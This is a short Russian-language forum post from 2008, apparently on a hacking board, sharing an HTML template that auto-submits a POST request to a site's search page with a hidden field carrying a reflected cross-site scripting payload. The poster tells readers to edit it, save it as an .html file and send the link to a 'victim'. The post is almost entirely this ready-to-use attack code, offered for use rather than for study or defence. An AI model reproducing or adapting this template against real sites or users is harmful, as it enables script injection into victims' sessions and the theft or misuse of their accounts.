09.09.2008, 23:02
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
PHP код:
<form name='wtf' method='post' action='http://site.ru/search.php'>
<input type='hidden' name='search' value='"><script>alert(/xss/)</script>'>
</form>
<script>wtf.submit();</script>
правишь то что тебе надо, сохраняешь в .html и кидаешь ссылку на файл жертве
__________________
|
|
|